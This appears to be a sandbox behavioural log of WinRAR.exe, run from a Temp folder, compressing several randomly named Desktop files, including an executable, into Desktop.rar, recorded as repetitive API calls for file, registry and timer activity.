Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Compression False 1
Fn
File Create filename = Desktop.rar, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ False 1
Fn
File Create filename = \\?\C:\Users\WhuOXYsD\Desktop\Desktop.rar, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ False 1
Fn
File Get Info filename = Desktop.rar, type = file_attributes False 1
Fn
File Get Info filename = \\?\C:\Users\WhuOXYsD\Desktop\Desktop.rar, type = file_attributes False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Paths False 1
Fn
File Get Info filename = C:\Users\WhuOXYsD\AppData\Roaming\WinRAR, type = file_attributes True 1
Fn
File Get Info filename = C:\Users\WhuOXYsD\AppData\Roaming\WinRAR\Themes, type = file_attributes False 1
Fn
File Get Info filename = \\?\C:\Users\WhuOXYsD\AppData\Roaming\WinRAR\Themes, type = file_attributes False 1
Fn
Module Get Filename module_name = C:\Users\WhuOXYsD\AppData\Local\Temp\rarlng.dll, process_name = c:\users\whuoxysd\appdata\local\temp\winrar.exe, file_name_orig = C:\Users\WhuOXYsD\AppData\Local\Temp\WinRAR.exe, size = 2048 True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes, value_name = ShellExtBMP, size = 2, type = REG_SZ True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes, value_name = ShellExtIcon, size = 2, type = REG_SZ True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\FileList False 1
Fn
Window Create class_name = SysListView32, wndproc_parameter = 0 True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\FileList False 6
Fn
System Get Info type = Operating System True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\FileList False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths False 9
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\FileList\ArcColumnStates False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnStates False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\FileList\ArcColumnStates False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnStates False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\FileList\ArcColumnStates False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnStates False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\FileList\ArcColumnStates False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnStates False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\FileList\ArcColumnStates False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnStates False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Paths False 1
Fn
File Get Info filename = Desktop.rar, type = file_attributes False 1
Fn
File Get Info filename = \\?\C:\Users\WhuOXYsD\Desktop\Desktop.rar, type = file_attributes False 1
Fn
System Get Time type = Performance Ctr, time = 12872668189 True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Interface True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Interface, value_name = SystemProgressBar, data = 1, type = REG_NONE False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Interface True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Interface, value_name = TaskbarProgressBar, data = 1, type = REG_NONE False 1
Fn
Window Create class_name = tooltips_class32, wndproc_parameter = 0 True 1
Fn
Window Create class_name = tooltips_class32, wndproc_parameter = 0 True 1
Fn
System Get Time type = Ticks, time = 10896420 True 1
Fn
System Get Time type = Ticks, time = 10896420 True 1
Fn
System Get Time type = Ticks, time = 10896420 True 1
Fn
Keyboard Read virtual_key_code = VK_SHIFT, result_out = 0 True 1
Fn
System Get Time type = Ticks, time = 10896420 True 1
Fn
Module Get Handle module_name = c:\windows\system32\kernel32.dll, base_address = 0x77ae0000 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = CompareStringOrdinal, address_out = 0x77afd720 True 1
Fn
System Get Time type = System Time, time = 2019-04-02 12:04:17 (UTC) True 1
Fn
System Get Time type = Performance Ctr, time = 12929900214 True 1
Fn
System Get Time type = System Time, time = 2019-04-02 12:04:17 (UTC) True 1
Fn
System Get Time type = Performance Ctr, time = 12930018838 True 1
Fn
File Create filename = Desktop.rar, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ False 1
Fn
File Create filename = \\?\C:\Users\WhuOXYsD\Desktop\Desktop.rar, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ False 1
Fn
File Create filename = Desktop.rar, desired_access = GENERIC_WRITE, GENERIC_READ True 1
Fn
System Get Time type = Ticks, time = 10896685 True 1
Fn
File Write filename = Desktop.rar, size = 8 True 1
Fn
Data
File Write filename = Desktop.rar, size = 18 True 1
Fn
Data
File Create filename = 0SoXJeVDMd8XB.wav, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
System Get Time type = Ticks, time = 10899337 True 1
Fn
System Get Time type = Performance Ctr, time = 13196364461 True 1
Fn
System Get Time type = Ticks, time = 10899493 True 1
Fn
Keyboard Read virtual_key_code = VK_SHIFT, result_out = 0 True 1
Fn
System Get Time type = System Time, time = 2019-04-02 12:04:20 (UTC) True 1
Fn
System Get Time type = Performance Ctr, time = 13211114475 True 1
Fn
File Read filename = 0SoXJeVDMd8XB.wav, size = 1048576, size_out = 53827 True 1
Fn
Data
File Read filename = 0SoXJeVDMd8XB.wav, size = 994749, size_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_SHIFT, result_out = 0 True 1
Fn
System Get Time type = Ticks, time = 10899493 True 1
Fn
System Get Time type = Performance Ctr, time = 13212280596 True 1
Fn
System Get Time type = Ticks, time = 10899493 True 1
Fn
System Get Time type = Ticks, time = 10899509 True 1
Fn
System Get Time type = Ticks, time = 10899509 True 1
Fn
COM Create interface = EA1AFB91-9E28-4B86-90E9-9E9F8A5EEFAF, cls_context = CLSCTX_INPROC_SERVER True 1
Fn
System Get Time type = Ticks, time = 10899883 True 1
Fn
System Get Time type = Performance Ctr, time = 13437021817 True 1
Fn
System Get Time type = Ticks, time = 10899945 True 3
Fn
COM Create interface = EA1AFB91-9E28-4B86-90E9-9E9F8A5EEFAF, cls_context = CLSCTX_INPROC_SERVER True 1
Fn
File Write filename = Desktop.rar, size = 53984 True 1
Fn
Data
File Write filename = Desktop.rar, size = 101 True 1
Fn
Data
File Create filename = 4XGIZDiLaaAzBLi8uMJ.gif, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
System Get Time type = Ticks, time = 10900195 True 1
Fn
System Get Time type = Ticks, time = 10900195 True 1
Fn
System Get Time type = System Time, time = 2019-04-02 12:04:20 (UTC) True 1
Fn
System Get Time type = Performance Ctr, time = 13462281104 True 1
Fn
File Read filename = 4XGIZDiLaaAzBLi8uMJ.gif, size = 1048576, size_out = 34749 True 1
Fn
Data
File Read filename = 4XGIZDiLaaAzBLi8uMJ.gif, size = 1013827, size_out = 0 True 1
Fn
System Get Time type = Ticks, time = 10900195 True 1
Fn
System Get Time type = Performance Ctr, time = 13462564984 True 1
Fn
System Get Time type = Ticks, time = 10900195 True 3
Fn
COM Create interface = EA1AFB91-9E28-4B86-90E9-9E9F8A5EEFAF, cls_context = CLSCTX_INPROC_SERVER True 1
Fn
System Get Time type = Ticks, time = 10900195 True 1
Fn
System Get Time type = Performance Ctr, time = 13463057023 True 1
Fn
System Get Time type = Ticks, time = 10900195 True 3
Fn
File Write filename = Desktop.rar, size = 34880 True 1
Fn
Data
File Write filename = Desktop.rar, size = 107 True 1
Fn
Data
File Create filename = 8ZCScAn2t4O2J7-d.doc, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
System Get Time type = Ticks, time = 10900211 True 1
Fn
System Get Time type = Ticks, time = 10900211 True 1
Fn
System Get Time type = System Time, time = 2019-04-02 12:04:20 (UTC) True 1
Fn
System Get Time type = Performance Ctr, time = 13463617651 True 1
Fn
File Read filename = 8ZCScAn2t4O2J7-d.doc, size = 1048576, size_out = 6103 True 1
Fn
Data
File Read filename = 8ZCScAn2t4O2J7-d.doc, size = 1042473, size_out = 0 True 1
Fn
System Get Time type = Ticks, time = 10900211 True 1
Fn
System Get Time type = Performance Ctr, time = 13463764445 True 1
Fn
System Get Time type = Ticks, time = 10900211 True 4
Fn
System Get Time type = Performance Ctr, time = 13463982241 True 1
Fn
System Get Time type = Ticks, time = 10900211 True 3
Fn
File Write filename = Desktop.rar, size = 6144 True 1
Fn
Data
File Write filename = Desktop.rar, size = 102 True 1
Fn
Data
File Create filename = AVuWJQwE5di201z9 d.ots, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
System Get Time type = Ticks, time = 10900211 True 1
Fn
System Get Time type = Ticks, time = 10900211 True 1
Fn
System Get Time type = System Time, time = 2019-04-02 12:04:20 (UTC) True 1
Fn
System Get Time type = Performance Ctr, time = 13464298504 True 1
Fn
File Read filename = AVuWJQwE5di201z9 d.ots, size = 1048576, size_out = 56152 True 1
Fn
Data
File Read filename = AVuWJQwE5di201z9 d.ots, size = 992424, size_out = 0 True 1
Fn
System Get Time type = Ticks, time = 10900211 True 1
Fn
System Get Time type = Performance Ctr, time = 13464433258 True 1
Fn
System Get Time type = Ticks, time = 10900211 True 4
Fn
System Get Time type = Performance Ctr, time = 13464954266 True 1
Fn
System Get Time type = Ticks, time = 10900211 True 3
Fn
File Write filename = Desktop.rar, size = 56288 True 1
Fn
Data
File Write filename = Desktop.rar, size = 106 True 1
Fn
Data
File Create filename = CjID.mp3, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
System Get Time type = Ticks, time = 10900226 True 1
Fn
System Get Time type = Ticks, time = 10900226 True 1
Fn
System Get Time type = System Time, time = 2019-04-02 12:04:21 (UTC) True 1
Fn
System Get Time type = Performance Ctr, time = 13465574069 True 1
Fn
File Read filename = CjID.mp3, size = 1048576, size_out = 52912 True 1
Fn
Data
File Read filename = CjID.mp3, size = 995664, size_out = 0 True 1
Fn
System Get Time type = Ticks, time = 10900226 True 1
Fn
System Get Time type = Performance Ctr, time = 13465788819 True 1
Fn
System Get Time type = Ticks, time = 10900226 True 4
Fn
System Get Time type = Performance Ctr, time = 13466220026 True 1
Fn
System Get Time type = Ticks, time = 10900226 True 3
Fn
File Write filename = Desktop.rar, size = 53056 True 1
Fn
Data
File Write filename = Desktop.rar, size = 92 True 1
Fn
Data
File Create filename = czSQaVnIQO 0LFtEP.flv, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
System Get Time type = Ticks, time = 10900242 True 1
Fn
System Get Time type = Ticks, time = 10900242 True 1
Fn
System Get Time type = System Time, time = 2019-04-02 12:04:21 (UTC) True 1
Fn
System Get Time type = Performance Ctr, time = 13466826965 True 1
Fn
File Read filename = czSQaVnIQO 0LFtEP.flv, size = 1048576, size_out = 64574 True 1
Fn
Data
File Read filename = czSQaVnIQO 0LFtEP.flv, size = 984002, size_out = 0 True 1
Fn
System Get Time type = Ticks, time = 10900242 True 1
Fn
System Get Time type = Performance Ctr, time = 13467043611 True 1
Fn
System Get Time type = Ticks, time = 10900242 True 3
Fn
System Get Time type = Ticks, time = 10900335 True 1
Fn
System Get Time type = Performance Ctr, time = 13476522789 True 1
Fn
System Get Time type = Ticks, time = 10900335 True 3
Fn
File Write filename = Desktop.rar, size = 64704 True 1
Fn
Data
File Write filename = Desktop.rar, size = 106 True 1
Fn
Data
File Create filename = desktop.ini, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
System Get Time type = Ticks, time = 10900335 True 1
Fn
System Get Time type = Ticks, time = 10900335 True 1
Fn
System Get Time type = System Time, time = 2019-04-02 12:04:21 (UTC) True 1
Fn
System Get Time type = Performance Ctr, time = 13477230184 True 1
Fn
File Read filename = desktop.ini, size = 1048576, size_out = 282 True 1
Fn
Data
File Read filename = desktop.ini, size = 1048294, size_out = 0 True 1
Fn
System Get Time type = Ticks, time = 10900351 True 1
Fn
System Get Time type = Performance Ctr, time = 13477532209 True 1
Fn
System Get Time type = Ticks, time = 10900351 True 4
Fn
System Get Time type = Performance Ctr, time = 13477595192 True 1
Fn
System Get Time type = Ticks, time = 10900351 True 3
Fn
File Write filename = Desktop.rar, size = 176 True 1
Fn
Data
File Write filename = Desktop.rar, size = 93 True 1
Fn
Data
File Create filename = dfxuFxjX5YwdPMIH\2A58ceH2t.png, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
System Get Time type = Ticks, time = 10900351 True 1
Fn
System Get Time type = Ticks, time = 10900351 True 1
Fn
System Get Time type = System Time, time = 2019-04-02 12:04:21 (UTC) True 1
Fn
System Get Time type = Performance Ctr, time = 13477884501 True 1
Fn
File Read filename = dfxuFxjX5YwdPMIH\2A58ceH2t.png, size = 1048576, size_out = 89167 True 1
Fn
Data
File Read filename = dfxuFxjX5YwdPMIH\2A58ceH2t.png, size = 959409, size_out = 0 True 1
Fn
System Get Time type = Ticks, time = 10900351 True 1
Fn
System Get Time type = Performance Ctr, time = 13478029887 True 1
Fn
System Get Time type = Ticks, time = 10900351 True 3
Fn
System Get Time type = Ticks, time = 10900367 True 1
Fn
System Get Time type = Performance Ctr, time = 13479366267 True 1
Fn
System Get Time type = Ticks, time = 10900367 True 3
Fn
File Write filename = Desktop.rar, size = 89376 True 1
Fn
Data
File Write filename = Desktop.rar, size = 114 True 1
Fn
Data
File Create filename = dfxuFxjX5YwdPMIH\OsbsjTTafsX31mSiaRnW.ppt, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
System Get Time type = Ticks, time = 10900367 True 1
Fn
System Get Time type = Ticks, time = 10900367 True 1
Fn
System Get Time type = System Time, time = 2019-04-02 12:04:21 (UTC) True 1
Fn
System Get Time type = Performance Ctr, time = 13480099743 True 1
Fn
File Read filename = dfxuFxjX5YwdPMIH\OsbsjTTafsX31mSiaRnW.ppt, size = 1048576, size_out = 58444 True 1
Fn
Data
File Read filename = dfxuFxjX5YwdPMIH\OsbsjTTafsX31mSiaRnW.ppt, size = 990132, size_out = 0 True 1
Fn
System Get Time type = Ticks, time = 10900367 True 1
Fn
System Get Time type = Performance Ctr, time = 13480418697 True 1
Fn
System Get Time type = Ticks, time = 10900367 True 3
Fn
System Get Time type = Ticks, time = 10900382 True 1
Fn
System Get Time type = Performance Ctr, time = 13480904298 True 1
Fn
System Get Time type = Ticks, time = 10900382 True 3
Fn
File Write filename = Desktop.rar, size = 58576 True 1
Fn
Data
File Write filename = Desktop.rar, size = 125 True 1
Fn
Data
File Create filename = dfxuFxjX5YwdPMIH\YEeHQp1lME uExplJtB3.flv, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
System Get Time type = Ticks, time = 10900382 True 1
Fn
System Get Time type = Ticks, time = 10900382 True 1
Fn
System Get Time type = System Time, time = 2019-04-02 12:04:21 (UTC) True 1
Fn
System Get Time type = Performance Ctr, time = 13481491407 True 1
Fn
File Read filename = dfxuFxjX5YwdPMIH\YEeHQp1lME uExplJtB3.flv, size = 1048576, size_out = 36157 True 1
Fn
Data
File Read filename = dfxuFxjX5YwdPMIH\YEeHQp1lME uExplJtB3.flv, size = 1012419, size_out = 0 True 1
Fn
System Get Time type = Ticks, time = 10900382 True 1
Fn
System Get Time type = Performance Ctr, time = 13481696627 True 1
Fn
System Get Time type = Ticks, time = 10900382 True 3
Fn
System Get Time type = Ticks, time = 10900554 True 1
Fn
System Get Time type = Performance Ctr, time = 13498080682 True 1
Fn
System Get Time type = Ticks, time = 10900554 True 1
Fn
System Get Time type = Ticks, time = 10900554 True 1
Fn
System Get Time type = Ticks, time = 10900554 True 1
Fn
COM Create interface = EA1AFB91-9E28-4B86-90E9-9E9F8A5EEFAF, cls_context = CLSCTX_INPROC_SERVER True 1
Fn
File Write filename = Desktop.rar, size = 36304 True 1
Fn
Data
File Write filename = Desktop.rar, size = 125 True 1
Fn
Data
File Create filename = e-bHwq0LPy0uA9lpR0jp.jpg, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
System Get Time type = Ticks, time = 10900554 True 1
Fn
System Get Time type = Ticks, time = 10900554 True 1
Fn
System Get Time type = System Time, time = 2019-04-02 12:04:21 (UTC) True 1
Fn
System Get Time type = Performance Ctr, time = 13498843309 True 1
Fn
File Read filename = e-bHwq0LPy0uA9lpR0jp.jpg, size = 1048576, size_out = 70986 True 1
Fn
Data
File Read filename = e-bHwq0LPy0uA9lpR0jp.jpg, size = 977590, size_out = 0 True 1
Fn
System Get Time type = Ticks, time = 10900554 True 1
Fn
System Get Time type = Performance Ctr, time = 13499093119 True 1
Fn
System Get Time type = Ticks, time = 10900554 True 3
Fn
System Get Time type = Ticks, time = 10900569 True 1
Fn
System Get Time type = Performance Ctr, time = 13499735238 True 1
Fn
System Get Time type = Ticks, time = 10900569 True 3
Fn
File Write filename = Desktop.rar, size = 71168 True 1
Fn
Data
File Write filename = Desktop.rar, size = 108 True 1
Fn
Data
File Create filename = f7MdNo-AKV0.mkv, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
System Get Time type = Ticks, time = 10900569 True 1
Fn
System Get Time type = Ticks, time = 10900569 True 1
Fn
System Get Time type = System Time, time = 2019-04-02 12:04:21 (UTC) True 1
Fn
System Get Time type = Performance Ctr, time = 13500545471 True 1
Fn
File Read filename = f7MdNo-AKV0.mkv, size = 1048576, size_out = 47783 True 1
Fn
Data
File Read filename = f7MdNo-AKV0.mkv, size = 1000793, size_out = 0 True 1
Fn
System Get Time type = Ticks, time = 10900569 True 1
Fn
System Get Time type = Performance Ctr, time = 13500792808 True 1
Fn
System Get Time type = Ticks, time = 10900569 True 3
Fn
System Get Time type = Ticks, time = 10900585 True 1
Fn
System Get Time type = Performance Ctr, time = 13501208066 True 1
Fn
System Get Time type = Ticks, time = 10900585 True 3
Fn
File Write filename = Desktop.rar, size = 47872 True 1
Fn
Data
File Write filename = Desktop.rar, size = 99 True 1
Fn
Data
File Create filename = Fj4kdfeguFEe8WDxBVP.png, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
System Get Time type = Ticks, time = 10900585 True 1
Fn
System Get Time type = Ticks, time = 10900585 True 1
Fn
System Get Time type = System Time, time = 2019-04-02 12:04:21 (UTC) True 1
Fn
System Get Time type = Performance Ctr, time = 13501718702 True 1
Fn
File Read filename = Fj4kdfeguFEe8WDxBVP.png, size = 1048576, size_out = 23495 True 1
Fn
Data
File Read filename = Fj4kdfeguFEe8WDxBVP.png, size = 1025081, size_out = 0 True 1
Fn
System Get Time type = Ticks, time = 10900585 True 1
Fn
System Get Time type = Performance Ctr, time = 13502069192 True 1
Fn
System Get Time type = Ticks, time = 10900585 True 4
Fn
System Get Time type = Performance Ctr, time = 13502328086 True 1
Fn
System Get Time type = Ticks, time = 10900585 True 3
Fn
File Write filename = Desktop.rar, size = 23584 True 1
Fn
Data
File Write filename = Desktop.rar, size = 107 True 1
Fn
Data
File Create filename = FuvJMN.m4a, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
System Get Time type = Ticks, time = 10900601 True 1
Fn
System Get Time type = Ticks, time = 10900601 True 1
Fn
System Get Time type = System Time, time = 2019-04-02 12:04:21 (UTC) True 1
Fn
System Get Time type = Performance Ctr, time = 13502759548 True 1
Fn
File Read filename = FuvJMN.m4a, size = 1048576, size_out = 63964 True 1
Fn
Data
File Read filename = FuvJMN.m4a, size = 984612, size_out = 0 True 1
Fn
System Get Time type = Ticks, time = 10900601 True 1
Fn
System Get Time type = Performance Ctr, time = 13502922029 True 1
Fn
System Get Time type = Ticks, time = 10900601 True 3
Fn
System Get Time type = Ticks, time = 10900694 True 1
Fn
System Get Time type = Performance Ctr, time = 13512273156 True 1
Fn
System Get Time type = Ticks, time = 10900694 True 3
Fn
File Write filename = Desktop.rar, size = 64096 True 1
Fn
Data
File Write filename = Desktop.rar, size = 94 True 1
Fn
Data
File Create filename = gblyrzexggw.exe, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
System Get Time type = Ticks, time = 10900694 True 1
Fn
System Get Time type = Ticks, time = 10900694 True 1
Fn
System Get Time type = System Time, time = 2019-04-02 12:04:21 (UTC) True 1
Fn
System Get Time type = Performance Ctr, time = 13512885640 True 1
Fn
File Read filename = gblyrzexggw.exe, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Read filename = gblyrzexggw.exe, size = 3145728, size_out = 3145728 True 1
Fn
System Get Time type = Ticks, time = 10900835 True 1
Fn
System Get Time type = Performance Ctr, time = 13526812910 True 1
Fn
System Get Time type = Ticks, time = 10900835 True 3
Fn
COM Create interface = EA1AFB91-9E28-4B86-90E9-9E9F8A5EEFAF, cls_context = CLSCTX_INPROC_SERVER True 1
Fn
File Write filename = Desktop.rar, size = 262144 True 12
Fn
Data
File Read filename = gblyrzexggw.exe, size = 4194304, size_out = 3889152 True 1
Fn
System Get Time type = Ticks, time = 10902629 True 1
Fn
System Get Time type = Performance Ctr, time = 28213577408 True 1
Fn
System Get Time type = Ticks, time = 10902722 True 1
Fn
System Get Time type = Ticks, time = 10902722 True 1
Fn
System Get Time type = Ticks, time = 10902722 True 1
Fn
COM Create interface = EA1AFB91-9E28-4B86-90E9-9E9F8A5EEFAF, cls_context = CLSCTX_INPROC_SERVER True 1
Fn
File Write filename = Desktop.rar, size = 262144 True 15
Fn
Data
File Read filename = gblyrzexggw.exe, size = 4194304, size_out = 0 True 1
Fn
System Get Time type = Ticks, time = 10903892 True 1
Fn
System Get Time type = Performance Ctr, time = 59820875328 True 1
Fn
System Get Time type = Ticks, time = 10903892 True 1
Fn
System Get Time type = Ticks, time = 10903892 True 1
Fn
System Get Time type = Ticks, time = 10903892 True 1
Fn
COM Create interface = EA1AFB91-9E28-4B86-90E9-9E9F8A5EEFAF, cls_context = CLSCTX_INPROC_SERVER True 1
Fn
File Write filename = Desktop.rar, size = 40160 True 1
Fn
Data
File Write filename = Desktop.rar, size = 103 True 1
Fn
Data
File Create filename = HAuM_g1AD_0J.mp4, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
System Get Time type = Ticks, time = 10903892 True 1
Fn
System Get Time type = Ticks, time = 10903892 True 1
Fn
System Get Time type = System Time, time = 2019-04-02 12:04:24 (UTC) True 1
Fn
System Get Time type = Performance Ctr, time = 63320669952 True 1
Fn
File Read filename = HAuM_g1AD_0J.mp4, size = 1048576, size_out = 44059 True 1
Fn
Data
File Read filename = HAuM_g1AD_0J.mp4, size = 1004517, size_out = 0 True 1
Fn
System Get Time type = Ticks, time = 10903892 True 1
Fn
System Get Time type = Performance Ctr, time = 63321061989 True 1
Fn
System Get Time type = Ticks, time = 10903892 True 1
Fn
System Get Time type = Ticks, time = 10903892 True 1
Fn
System Get Time type = Ticks, time = 10903892 True 1
Fn
COM Create interface = EA1AFB91-9E28-4B86-90E9-9E9F8A5EEFAF, cls_context = CLSCTX_INPROC_SERVER True 1
Fn
System Get Time type = Ticks, time = 10903908 True 1
Fn
System Get Time type = Performance Ctr, time = 63321709259 True 1
Fn
System Get Time type = Ticks, time = 10903908 True 3
Fn
File Write filename = Desktop.rar, size = 44160 True 1
Fn
Data
File Write filename = Desktop.rar, size = 100 True 1
Fn
Data
File Create filename = jGh255P.m4a, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
System Get Time type = Ticks, time = 10903908 True 1
Fn
System Get Time type = Ticks, time = 10903908 True 1
Fn
System Get Time type = System Time, time = 2019-04-02 12:04:24 (UTC) True 1
Fn
System Get Time type = Performance Ctr, time = 63322137687 True 1
Fn
File Read filename = jGh255P.m4a, size = 1048576, size_out = 42260 True 1
Fn
Data
File Read filename = jGh255P.m4a, size = 1006316, size_out = 0 True 1
Fn
System Get Time type = Ticks, time = 10903908 True 1
Fn
System Get Time type = Performance Ctr, time = 63322304853 True 1
Fn
System Get Time type = Ticks, time = 10903908 True 4
Fn
System Get Time type = Performance Ctr, time = 63322654258 True 1
Fn
System Get Time type = Ticks, time = 10903908 True 3
Fn
File Write filename = Desktop.rar, size = 42368 True 1
Fn
Data
File Write filename = Desktop.rar, size = 95 True 1
Fn
Data
File Create filename = JhTtCfiuDFLeGwcL.bmp, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
System Get Time type = Ticks, time = 10903923 True 1
Fn
System Get Time type = Ticks, time = 10903923 True 1
Fn
System Get Time type = System Time, time = 2019-04-02 12:04:24 (UTC) True 1
Fn
System Get Time type = Performance Ctr, time = 63323122692 True 1
Fn
File Read filename = JhTtCfiuDFLeGwcL.bmp, size = 1048576, size_out = 85856 True 1
Fn
Data
File Read filename = JhTtCfiuDFLeGwcL.bmp, size = 962720, size_out = 0 True 1
Fn
System Get Time type = Ticks, time = 10903923 True 1
Fn
System Get Time type = Performance Ctr, time = 63323303990 True 1
Fn
System Get Time type = Ticks, time = 10903923 True 3
Fn
System Get Time type = Ticks, time = 10904126 True 1
Fn
System Get Time type = Performance Ctr, time = 63346510474 True 1
Fn
System Get Time type = Ticks, time = 10904126 True 3
Fn
COM Create interface = EA1AFB91-9E28-4B86-90E9-9E9F8A5EEFAF, cls_context = CLSCTX_INPROC_SERVER True 1
Fn
File Write filename = Desktop.rar, size = 86048 True 1
Fn
Data
File Write filename = Desktop.rar, size = 104 True 1
Fn
Data
File Create filename = L4T8mDg3vHms9Y.xls, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
System Get Time type = Ticks, time = 10904142 True 1
Fn
System Get Time type = Ticks, time = 10904142 True 1
Fn
System Get Time type = System Time, time = 2019-04-02 12:04:24 (UTC) True 1
Fn
System Get Time type = Performance Ctr, time = 66846431859 True 1
Fn
File Read filename = L4T8mDg3vHms9Y.xls, size = 1048576, size_out = 56779 True 1
Fn
Data
File Read filename = L4T8mDg3vHms9Y.xls, size = 991797, size_out = 0 True 1
Fn
System Get Time type = Ticks, time = 10904142 True 1
Fn
System Get Time type = Performance Ctr, time = 66846742333 True 1
Fn
System Get Time type = Ticks, time = 10904142 True 1
Fn
System Get Time type = Ticks, time = 10904142 True 1
Fn
System Get Time type = Ticks, time = 10904142 True 1
Fn
COM Create interface = EA1AFB91-9E28-4B86-90E9-9E9F8A5EEFAF, cls_context = CLSCTX_INPROC_SERVER True 1
Fn
System Get Time type = Ticks, time = 10904142 True 1
Fn
System Get Time type = Performance Ctr, time = 66847363333 True 1
Fn
System Get Time type = Ticks, time = 10904142 True 3
Fn
File Write filename = Desktop.rar, size = 56912 True 1
Fn
Data
File Write filename = Desktop.rar, size = 102 True 1
Fn
Data
File Create filename = LFfk9JORsG.avi, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
System Get Time type = Ticks, time = 10904157 True 1
Fn
System Get Time type = Ticks, time = 10904157 True 1
Fn
System Get Time type = System Time, time = 2019-04-02 12:04:24 (UTC) True 1
Fn
System Get Time type = Performance Ctr, time = 66848426144 True 1
Fn
File Read filename = LFfk9JORsG.avi, size = 1048576, size_out = 69289 True 1
Fn
Data
File Read filename = LFfk9JORsG.avi, size = 979287, size_out = 0 True 1
Fn
System Get Time type = Ticks, time = 10904157 True 1
Fn
System Get Time type = Performance Ctr, time = 66848645547 True 1
Fn
System Get Time type = Ticks, time = 10904157 True 3
Fn
